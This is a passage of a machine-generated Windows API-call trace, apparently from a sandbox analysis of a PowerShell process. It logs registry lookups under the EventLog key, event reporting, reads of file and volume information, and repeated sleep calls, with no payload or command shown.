hKey=0x64c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.851] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x6ac) returned 0x0 [0146.851] RegCloseKey (hKey=0x6ac) returned 0x0 [0146.851] RegCloseKey (hKey=0x64c) returned 0x0 [0146.852] RegCloseKey (hKey=0x288) returned 0x0 [0146.853] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0dc | out: phkResult=0x724f0dc*=0x288) returned 0x0 [0146.854] RegQueryInfoKeyW (in: hKey=0x288, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x724f12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x724f12c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f128*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.854] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x0, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.854] CoTaskMemFree (pv=0x0) [0146.854] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x1, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.854] CoTaskMemFree (pv=0x0) [0146.854] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x2, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.854] CoTaskMemFree (pv=0x0) [0146.854] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x3, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.854] CoTaskMemFree (pv=0x0) [0146.854] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x4, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.855] CoTaskMemFree (pv=0x0) [0146.855] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x5, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.855] CoTaskMemFree (pv=0x0) [0146.855] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x6, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.855] CoTaskMemFree (pv=0x0) [0146.855] RegEnumKeyExW (in: hKey=0x288, dwIndex=0x7, lpName=0x52192e8, lpcchName=0x724f148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x724f148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.855] CoTaskMemFree (pv=0x0) [0146.855] RegOpenKeyExW (in: hKey=0x288, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.855] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.855] RegCloseKey (hKey=0x64c) returned 0x0 [0146.855] RegOpenKeyExW (in: hKey=0x288, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.856] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.856] RegCloseKey (hKey=0x64c) returned 0x0 [0146.856] RegOpenKeyExW (in: hKey=0x288, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.856] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.856] RegCloseKey (hKey=0x64c) returned 0x0 [0146.856] RegOpenKeyExW (in: hKey=0x288, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.856] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.856] RegCloseKey (hKey=0x64c) returned 0x0 [0146.857] RegOpenKeyExW (in: hKey=0x288, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.857] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.857] RegCloseKey (hKey=0x64c) returned 0x0 [0146.857] RegOpenKeyExW (in: hKey=0x288, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.857] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.857] RegCloseKey (hKey=0x64c) returned 0x0 [0146.857] RegOpenKeyExW (in: hKey=0x288, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.858] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x0) returned 0x2 [0146.858] RegCloseKey (hKey=0x64c) returned 0x0 [0146.858] RegOpenKeyExW (in: hKey=0x288, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x64c) returned 0x0 [0146.858] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f108 | out: phkResult=0x724f108*=0x6ac) returned 0x0 [0146.858] RegCloseKey (hKey=0x6ac) returned 0x0 [0146.858] RegCloseKey (hKey=0x288) returned 0x0 [0146.860] RegCloseKey (hKey=0x64c) returned 0x0 [0146.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0c4 | out: phkResult=0x724f0c4*=0x64c) returned 0x0 [0146.862] RegQueryInfoKeyW (in: hKey=0x64c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x724f114, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f110, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x724f114*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f110*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.862] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x0, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.862] CoTaskMemFree (pv=0x0) [0146.862] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x1, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.862] CoTaskMemFree (pv=0x0) [0146.862] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x2, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.862] CoTaskMemFree (pv=0x0) [0146.863] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x3, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.863] CoTaskMemFree (pv=0x0) [0146.863] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x4, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.863] CoTaskMemFree (pv=0x0) [0146.863] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x5, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.863] CoTaskMemFree (pv=0x0) [0146.863] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x6, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.863] CoTaskMemFree (pv=0x0) [0146.863] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x7, lpName=0x521a328, lpcchName=0x724f130, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x724f130, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.863] CoTaskMemFree (pv=0x0) [0146.863] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.863] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.863] RegCloseKey (hKey=0x288) returned 0x0 [0146.863] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.863] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.864] RegCloseKey (hKey=0x288) returned 0x0 [0146.864] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.864] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.864] RegCloseKey (hKey=0x288) returned 0x0 [0146.864] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.864] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.864] RegCloseKey (hKey=0x288) returned 0x0 [0146.864] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.864] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.864] RegCloseKey (hKey=0x288) returned 0x0 [0146.865] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.865] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.865] RegCloseKey (hKey=0x288) returned 0x0 [0146.865] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.865] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x0) returned 0x2 [0146.865] RegCloseKey (hKey=0x288) returned 0x0 [0146.865] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x288) returned 0x0 [0146.866] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0f0 | out: phkResult=0x724f0f0*=0x6ac) returned 0x0 [0146.866] RegCloseKey (hKey=0x6ac) returned 0x0 [0146.866] RegCloseKey (hKey=0x64c) returned 0x0 [0146.866] RegCloseKey (hKey=0x288) returned 0x0 [0147.012] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x7a10004 [0147.015] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5265644*="Registry", lpRawData=0x521af50) returned 1 [0147.027] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x526836c*="Alias", lpRawData=0x5268294) returned 1 [0147.030] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x526b024*="Environment", lpRawData=0x526af4c) returned 1 [0147.032] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x724f0f4, nSize=0x80 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0147.032] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0147.032] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0147.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724f1ac) returned 1 [0147.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x724f228 | out: lpFileInformation=0x724f228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0147.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724f1a8) returned 1 [0147.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x724e950, nSize=0x80 | out: lpBuffer="က永က永") returned 0x0 [0147.034] GetLogicalDrives () returned 0x4 [0147.035] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0147.035] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724f198) returned 1 [0147.127] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x724f0a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x724f1c0, lpMaximumComponentLength=0x724f1bc, lpFileSystemFlags=0x724f1b8, lpFileSystemNameBuffer=0x724f038, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x724f1c0*=0xb4197730, lpMaximumComponentLength=0x724f1bc*=0xff, lpFileSystemFlags=0x724f1b8*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0147.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724f194) returned 1 [0147.128] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.128] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.128] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0147.128] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724f150) returned 1 [0147.128] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x526c2f8 | out: lpFileInformation=0x526c2f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xab82dba2, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab82dba2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0147.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724f14c) returned 1 [0147.129] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0147.129] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.368] PathIsNetworkPathW (pszPath="C:\\") returned 0 [0147.369] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0147.369] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.369] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.369] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.373] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0147.374] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x526e9f4*="FileSystem", lpRawData=0x526e91c) returned 1 [0147.691] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x527177c*="Function", lpRawData=0x52716a4) returned 1 [0147.695] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5274360*="Variable", lpRawData=0x5274288) returned 1 [0147.734] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.763] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.834] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.496] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.731] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.880] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.300] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.842] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.216] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.902] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.047] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.142] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.370] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.791] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.731] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.887] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.122] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.280] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.429] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.733] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.928] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.086] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.111] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.132] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.216] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 